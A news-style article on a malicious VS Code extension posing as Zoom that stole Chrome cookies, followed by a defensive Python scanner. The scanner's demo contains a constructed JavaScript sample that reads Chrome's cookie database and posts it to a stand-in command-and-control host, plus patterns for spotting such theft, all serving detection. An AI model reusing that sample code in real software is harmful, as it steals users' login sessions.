A new malicious extension for Visual Studio Code (VS Code) has been discovered that impersonates a legitimate Zoom application in order to steal sensitive cookies from Google Chrome. The extension was first uploaded to the VS Code Marketplace in November 2024 and went largely unnoticed. Researchers from ReversingLabs identified the threat and found that the extension gained trust by mimicking a popular application and by including a link to Zoom’s official GitHub repository. Once installed, it silently targeted Chrome’s cookie storage, potentially compromising users’ online sessions and enabling account hijacking.
The extension was distributed as a VSIX file and initially did not contain any malicious code.
However, later updates introduced harmful functionality designed to extract cookies from users’ systems. Specifically, the code targeted Chrome’s cookies and set up an asynchronous fetch to a suspicious external endpoint linked to command-and-control operations. The attack is concerning because it shows how cybercriminals can abuse trusted software platforms such as the VS Code Marketplace to distribute malware without users’ awareness.
The discovery of such malicious code within what appeared to be a harmless extension has raised serious concerns for developers and users of the VS Code Marketplace. The use of trusted software environments to distribute malware marks a shift in the tactics used by cybercriminals. Researchers also found hardcoded access keys within the extension’s files, adding to the severity of the threat. This underscores the importance of scrutinizing third-party tools, especially extensions, before integrating them into development environments.
To protect against such threats, users are advised to carefully check extension reviews, monitor updates for unexpected changes, and use additional security tools to detect unusual behavior. Developers must also prioritize security by educating teams on the risks associated with IDE extensions and implementing best practices for maintaining secure development environments. As cyber threats evolve, it is crucial to stay vigilant and proactive in safeguarding sensitive data from such evolving tactics.
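As an added example (not code from ReversingLabs, the extension, or VS Code), the following Python script shows one way to act on the advice above: baseline the installed extensions, flag those whose code changed after an update, and scan only the changed code for the combination described in this article, references to Chrome's cookie store together with outbound requests to a host the extension has no declared reason to contact. The extension folder name, the endpoint `c2.example.invalid`, the allowlist and the sample JavaScript are constructed placeholders.

```python
import hashlib, re, tempfile
from pathlib import Path

# Chrome's user-data directory names and the profile-relative cookie DB path.
COOKIE_PATTERNS = [r"Google[\\/]Chrome[\\/]User Data", r"\.config[\\/]google-chrome",
                   r"(?:Default|Profile \d+)[\\/](?:Network[\\/])?Cookies"]
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_CALL_RE = re.compile(r"\b(?:fetch|axios|https?\.request|https?\.get|XMLHttpRequest)\b")
ALLOWED_HOSTS = frozenset({"github.com", "marketplace.visualstudio.com"})  # assumed allowlist

def scan_source(text: str) -> dict:
    """Findings for one JS file: cookie-store references, unexpected hosts, combined risk."""
    cookie_hits = [p for p in COOKIE_PATTERNS if re.search(p, text)]
    hosts = sorted({h.lower() for h in URL_RE.findall(text)})
    unexpected = [h for h in hosts if h not in ALLOWED_HOSTS]
    makes_requests = bool(NET_CALL_RE.search(text))
    return {"cookie_access": bool(cookie_hits), "unexpected_hosts": unexpected,
            "exfil_risk": bool(cookie_hits) and makes_requests and bool(unexpected)}

def snapshot(ext_dir: Path) -> dict:
    """sha256 over each extension folder's JS files: baseline before, compare after updates."""
    out = {}
    for ext in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
        h = hashlib.sha256()
        for js in sorted(ext.rglob("*.js")):
            h.update(js.read_bytes())
        out[ext.name] = h.hexdigest()
    return out

def changed_extensions(before: dict, after: dict) -> list:
    return sorted(n for n, d in after.items() if before.get(n) != d)

# Constructed sample: a benign first release and a later update that adds cookie theft.
BENIGN_V1 = 'const vscode = require("vscode");\nexports.activate = () => vscode.window.showInformationMessage("ready");\n'
MALICIOUS_V2 = BENIGN_V1 + (
    'const os = require("os"), path = require("path"), fs = require("fs");\n'
    'const db = path.join(os.homedir(), "AppData/Local/Google/Chrome/User Data/Default/Network/Cookies");\n'
    'fetch("https://c2.example.invalid/upload", {method: "POST", body: fs.readFileSync(db)});\n')

def run_demo() -> dict:
    """Install v1, baseline, apply the 'silent update', then diff and scan only what changed."""
    with tempfile.TemporaryDirectory() as tmp:
        ext_dir = Path(tmp)
        ext = ext_dir / "zoom-lookalike-1.0.0"  # constructed placeholder folder name
        ext.mkdir()
        (ext / "extension.js").write_text(BENIGN_V1)
        before = snapshot(ext_dir)
        (ext / "extension.js").write_text(MALICIOUS_V2)  # the update lands
        changed = changed_extensions(before, snapshot(ext_dir))
        return {"changed": changed, "findings": {n: scan_source((ext_dir / n / "extension.js").read_text()) for n in changed}}
```

Run `snapshot()` against your real extensions directory on a schedule and keep the previous result; a changed digest with `exfil_risk` set is the case worth a manual look, while a changed digest alone is just an ordinary update.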